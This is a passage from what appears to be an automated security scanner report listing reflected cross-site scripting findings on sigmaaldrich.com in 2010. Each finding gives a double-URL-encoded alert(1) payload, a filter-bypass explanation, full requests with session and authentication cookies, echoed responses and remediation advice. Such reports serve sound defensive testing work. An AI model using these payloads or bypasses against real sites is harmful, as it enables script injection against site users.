...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/services532c1";alert(1)//7d48ae8fdcf/regulatory-compliance","E404") ;
   </script>
...[SNIP]...

1.209. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/regulatory-compliance [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/regulatory-compliance

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6384b%2522%253balert%25281%2529%252f%252fd140bc9c766 was submitted in the REST URL parameter 6. This input was echoed as 6384b";alert(1)//d140bc9c766 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/services/regulatory-compliance6384b%2522%253balert%25281%2529%252f%252fd140bc9c766 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:42 GMT
Content-Length: 28990
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/services/regulatory-compliance6384b";alert(1)//d140bc9c766","E404") ;
   </script>
...[SNIP]...

1.210. http://www.sigmaaldrich.com/content/sigma-aldrich/site-level/career-opportunites [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/site-level/career-opportunites

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f3f1%2522%253balert%25281%2529%252f%252fe57c6beb41f was submitted in the REST URL parameter 1. This input was echoed as 1f3f1";alert(1)//e57c6beb41f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content1f3f1%2522%253balert%25281%2529%252f%252fe57c6beb41f/sigma-aldrich/site-level/career-opportunites HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:16 GMT
Content-Length: 28956
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content1f3f1";alert(1)//e57c6beb41f/sigma-aldrich/site-level/career-opportunites","E404") ;
   </script>
...[SNIP]...

1.211. http://www.sigmaaldrich.com/content/sigma-aldrich/site-level/career-opportunites [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/site-level/career-opportunites

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1f40%2522%253balert%25281%2529%252f%252fbc1d42fec09 was submitted in the REST URL parameter 2. This input was echoed as b1f40";alert(1)//bc1d42fec09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrichb1f40%2522%253balert%25281%2529%252f%252fbc1d42fec09/site-level/career-opportunites HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:18 GMT
Content-Length: 28956
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrichb1f40";alert(1)//bc1d42fec09/site-level/career-opportunites","E404") ;
   </script>
...[SNIP]...

1.212. http://www.sigmaaldrich.com/content/sigma-aldrich/site-level/career-opportunites [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/site-level/career-opportunites

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87951%2522%253balert%25281%2529%252f%252fbbeb77e979e was submitted in the REST URL parameter 3. This input was echoed as 87951";alert(1)//bbeb77e979e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/site-level87951%2522%253balert%25281%2529%252f%252fbbeb77e979e/career-opportunites HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:19 GMT
Content-Length: 28956
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/site-level87951";alert(1)//bbeb77e979e/career-opportunites","E404") ;
   </script>
...[SNIP]...

1.213. http://www.sigmaaldrich.com/content/sigma-aldrich/site-level/career-opportunites [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/site-level/career-opportunites

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26e21%2522%253balert%25281%2529%252f%252fc1e8dc9d45c was submitted in the REST URL parameter 4. This input was echoed as 26e21";alert(1)//c1e8dc9d45c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/site-level/career-opportunites26e21%2522%253balert%25281%2529%252f%252fc1e8dc9d45c HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:21 GMT
Content-Length: 28956
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/site-level/career-opportunites26e21";alert(1)//c1e8dc9d45c","E404") ;
   </script>
...[SNIP]...

1.214. http://www.sigmaaldrich.com/content/sigma-aldrich/site-level/privacy-policy [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/site-level/privacy-policy

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a356%2522%253balert%25281%2529%252f%252f72b398ea8f was submitted in the REST URL parameter 1. This input was echoed as 2a356";alert(1)//72b398ea8f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

